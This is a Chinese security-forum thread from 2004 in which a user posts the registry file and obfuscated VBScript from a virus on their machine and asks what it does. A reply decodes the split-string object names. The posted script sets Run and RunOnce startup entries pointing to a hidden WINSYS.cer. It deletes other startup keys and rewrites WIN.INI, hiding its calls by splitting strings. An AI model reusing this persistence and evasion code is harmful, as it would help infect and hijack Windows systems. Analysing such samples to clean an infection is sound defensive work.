论坛: 病毒专区 标题: 一个病毒文件 复制本贴地址    
作者: zeng7071 [zeng7071]    论坛用户   登录
[-HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run]
[HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run]
@="regedit -s C:\\$NtUninstallQ8875736$\\WINSYS.cer"

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"LogFeil"="C:\\$NtUninstallQ8875736$\\WINSYS.vbs"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"LogFeil"="regedit -s C:\\$NtUninstallQ8875736$\\WINSYS.cer"
"internat.exe"="internat.exe"
"zwupdows"=-
"win"=-
"mwin"=-
"intenet"=-
"Inernet"=-
"Internet"=-
"iexpleror"=-
"zxdows"=-
"qwe"=-
"win1"=-
"winwin"=-
"9i5zxdows"=-
"9i5com01zxdows"=-
"99zxdows"=-
"syste"=-
"intelnat.exe"=-
"88zxdows"=-
"Start Pagewin"=-
"Start Page"=-
"9i5comzxdows"=-
"9q5zxdows"=-
"999izxdows"=-
"033zxdows"=-
"8zxdows"=-
"flash"=-
"3zxdows"=-
"interneet.exe"=-
"u88y"=-
"88u88"=-
"u18"=-
"u1881"=-
"u1882"=-
"u1883"=-
"u1884"=-
"u1885"=-
"u1886"=-
"u1887"=-
"u1888"=-
"system"=-
"u188"=-
"iexpler"=-
"u1810"=-
"WIN32"=-
"W1N32"=-
"Abank"=-
"Ziplog"=-
"SystemServices"=-
"stup"=-
"Services"=-
"WJQ32"=-
"syslog"=-


Set sss = CreateObject("WSc" + "ript.Sh" + "ell")
mhk="HK"&"LM\SO"&"FTWARE\Mi"&"cr"&"os"&"oft\Win"&"dows\Cu"&"rren"&"tVersion\Run\"
mhc="H"&"K"&"CU\So"&"ft"&"ware\Mic"&"ros"&"oft\Win"&"dows\Curren"&"tVersion\Run\"
mhk2="HK"&"LM\SO"&"FT"&"WARE\M"&"icr"&"osoft\Wi"&"n"&"dows\Curren"&"tVersion\"
sss.RegWrite ""&mhk&"LogFeil","regedit -s C:\$NtUninstallQ8875736$\WINSYS.cer"
sss.RegWrite ""&mhk&"internat.exe","internat.exe"
sss.RegWrite ""&mhk&"zwupdows","12"
sss.RegWrite ""&mhk&"win","12"
sss.RegWrite ""&mhk&"mwin","12"
sss.RegWrite ""&mhk&"internt","12"
sss.RegWrite ""&mhk&"Inernet","12"
sss.RegWrite ""&mhk&"Internet","12"
sss.RegWrite ""&mhk&"iexpleror","12"
sss.RegWrite ""&mhk&"zxdows","12"
sss.RegWrite ""&mhk&"qwe","12"
sss.RegWrite ""&mhk&"win1","12"
sss.RegWrite ""&mhk&"intelnat.exe","12"
sss.RegWrite ""&mhk&"u1888","12"
sss.RegWrite ""&mhk&"intenet","12"
sss.RegWrite ""&mhk&"9i5zxdows","12"
sss.RegWrite ""&mhk&"9i5com01zxdows","12"
sss.RegWrite ""&mhk&"99zxdows","12"
sss.RegWrite ""&mhk&"88zxdows","12"
sss.RegWrite ""&mhk&"Start Pagewin","12"
sss.RegWrite ""&mhk&"Start Page","12"
sss.RegWrite ""&mhk&"u188","12"
sss.RegWrite ""&mhk&"9i5comzxdows","12"
sss.RegWrite ""&mhk&"9q5zxdows","12"
sss.RegWrite ""&mhk&"u1881","12"
sss.RegWrite ""&mhk&"u1882","12"
sss.RegWrite ""&mhk&"u1883","12"
sss.RegWrite ""&mhk&"u1884","12"
sss.RegWrite ""&mhk&"u1885","12"
sss.RegWrite ""&mhk&"u1886","12"
sss.RegWrite ""&mhk&"u1887","12"
sss.RegWrite ""&mhk&"u88y", "12"
sss.RegWrite ""&mhk&"flash", "12"
sss.RegWrite ""&mhk&"999izxdows","12"
sss.RegWrite ""&mhk&"033zxdows","12"
sss.RegWrite ""&mhk&"syste","12"
sss.RegWrite ""&mhc&"my","12"
sss.RegWrite ""&mhk&"3zxdows","12"
sss.RegWrite ""&mhk&"88u88","12"
sss.RegWrite ""&mhk&"system","12"
sss.RegWrite ""&mhk&"8zxdows","12"
sss.RegWrite ""&mhk&"u18","12"
sss.RegWrite ""&mhk&"interneet.exe","12"
sss.RegWrite ""&mhk2&"RunOnce\", "12"
sss.RegWrite ""&mhk&"iexpler", "12"
sss.RegWrite ""&mhk&"u1810", "12"
sss.RegWrite ""&mhk&"winwin", "12"
sss.RegWrite ""&mhk&"WIN32", "12"
sss.RegWrite ""&mhk&"W1N32", "12"
sss.RegDelete ""&mhc&""
sss.RegDelete ""&mhk&"zwupdows"
sss.RegDelete ""&mhk&"win"
sss.RegDelete ""&mhk&"mwin"
sss.RegDelete ""&mhk&"internt"
sss.RegDelete ""&mhk&"inernet"
sss.RegDelete ""&mhk&"Internet"
sss.RegDelete ""&mhk&"u188"
sss.RegDelete ""&mhk&"iexpleror"
sss.RegDelete ""&mhk&"zxdows"
sss.RegDelete ""&mhk&"qwe"
sss.RegDelete ""&mhk&"win1"
sss.RegDelete ""&mhk&"intelnat.exe"
sss.RegDelete ""&mhk&"intenet"
sss.RegDelete ""&mhk&"9i5zxdows"
sss.RegDelete ""&mhk&"9i5com01zxdows"
sss.RegDelete ""&mhk&"99zxdows"
sss.RegDelete ""&mhk&"88zxdows"
sss.RegDelete ""&mhk&"Start Pagewin"
sss.RegDelete ""&mhk&"Start Page"
sss.RegDelete ""&mhk&"9i5comzxdows"
sss.RegDelete ""&mhk&"9q5zxdows"
sss.RegDelete ""&mhk&"999izxdows"
sss.RegDelete ""&mhk&"033zxdows"
sss.RegDelete ""&mhk&"u1881"
sss.RegDelete ""&mhk&"u1882"
sss.RegDelete ""&mhk&"u1883"
sss.RegDelete ""&mhk&"u1884"
sss.RegDelete ""&mhk&"u1885"
sss.RegDelete ""&mhk&"u1886"
sss.RegDelete ""&mhk&"u1887"
sss.RegDelete ""&mhk&"u88y"
sss.RegDelete ""&mhk&"flash"
sss.RegDelete ""&mhk&"88u88"
sss.RegDelete ""&mhk&"interneet.exe"
sss.RegDelete ""&mhk&"u18"
sss.RegDelete ""&mhk&"u1888"
sss.RegDelete ""&mhk&"system"
sss.RegDelete ""&mhk&"3zxdows"
sss.RegDelete ""&mhk&"8zxdows"
sss.RegDelete ""&mhk&"syste"
sss.RegDelete ""&mhk2&"RunOnce\"
sss.RegDelete ""&mhk&"iexpler"
sss.RegDelete ""&mhk&"u1810"
sss.RegDelete ""&mhk&"winwin"
sss.RegDelete ""&mhk&"WIN32"
sss.RegDelete ""&mhk&"W1N32"

Set FSO = CreateObject("Scrip" + "ting." + "FileSyst" + "emO" + "bject")
myfile14=FSO.FileExists("c:\wind" + "ows\W" + "IN.INI")
if myfile14 then
set FSO2=FSO.OpenTextFile("c:\win" + "dows\W" + "IN.INI")
mywin=FSO2.ReadALL()
l=Instr(mywin,"run=")-3
m=Instr(mywin,"load=")-1
n=Instr(mywin,"NullPort=")-3
FSO2.close
if l>0 and m>0 and l>m then
set FSO3=FSO.OpenTextFile("c:\wi" + "ndows\W" + "IN.INI")
mywin2=FSO3.Read(l)
FSO3.close
set FSO4=FSO.OpenTextFile("c:\win" + "dows\WI" + "N.INI")
mywin3=FSO4.Read(m)
FSO4.close
if n>0 and n>l then
set FSO5=FSO.OpenTextFile("c:\wind" + "ows\WIN" + ".INI")
mywin4=FSO5.Read(n)
FSO5.close
mywin=Replace(mywin,mywin4,"")
set FSO2=FSO.CreateTextFile("c:\win" + "dows\WI" + "N.INI")
FSO2.Write mywin3
FSO2.WriteLine "load="
FSO2.Write "run="
FSO2.Write mywin
FSO2.close
else
mywin=Replace(mywin,mywin2,"")
set FSO2=FSO.CreateTextFile("c:\win" + "dows\WI" + "N.INI")
FSO2.Write mywin3
FSO2.Write "load="
FSO2.Write mywin
FSO2.close
end if
end if
end if
能不能帮解释一下这个代表什么呢,我知道上面的那些,作用都是在启动过程中加载我中毒的那些文件,可是后面的就看不懂了,帮忙解释一下好吗


地主 发表时间: 04-05-18 09:56

回复: hackgou [hackgou]   论坛用户   登录
一楼的兄弟主要说的是:
sss和fso1,fso2,fso3这几个对象吧。
先看看:
Set sss = CreateObject("WSc" + "ript.Sh" + "ell")
这就相当于Set sss = CreateObject("WScript.Shell");这下就简单了吧,写这个脚本的人多半是为了躲避防火墙的检测猜故意绕的这个弯的。
然后用
sss.RegWrite ""&mhk&"W1N32", "12"
sss.RegDelete ""&mhc&""
来操作注册表。

至于fso1,fso2,fso3也是类似的:
Set FSO = CreateObject("Scrip" + "ting." + "FileSyst" + "emO" + "bject")
就等于:
Set FSO = CreateObject("Scripting.SystemObject")
然后来使用FSO读写文件系统。


B1层 发表时间: 04-05-18 11:10

回复: zeng7071 [zeng7071]   论坛用户   登录
"internat.exe"="internat.exe"
"zwupdows"=-
"win"=-
"mwin"=-
"intenet"=-
"Inernet"=-
"Internet"=-
"iexpleror"=-
"zxdows"=-
"qwe"=-
"win1"=-
"winwin"=-
"9i5zxdows"=-
"9i5com01zxdows"=-
"99zxdows"=-
"syste"=-
"intelnat.exe"=-
"88zxdows"=-
"Start Pagewin"=-
"Start Page"=-
"9i5comzxdows"=-
"9q5zxdows"=-
"999izxdows"=-
"033zxdows"=-
"8zxdows"=-
"flash"=-
"3zxdows"=-
"interneet.exe"=-
"u88y"=-
"88u88"=-
"u18"=-
"u1881"=-
"u1882"=-
"u1883"=-
"u1884"=-
"u1885"=-
"u1886"=-
"u1887"=-
"u1888"=-
"system"=-
"u188"=-
"iexpler"=-
"u1810"=-
"WIN32"=-
"W1N32"=-
"Abank"=-
"Ziplog"=-
"SystemServices"=-
"stup"=-
"Services"=-
"WJQ32"=-
"syslog"=-
谢谢.楼上的朋友,那这些呢,这些后面用"-"这个的作用是什么呢

B2层 发表时间: 04-05-19 11:43

论坛: 病毒专区

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号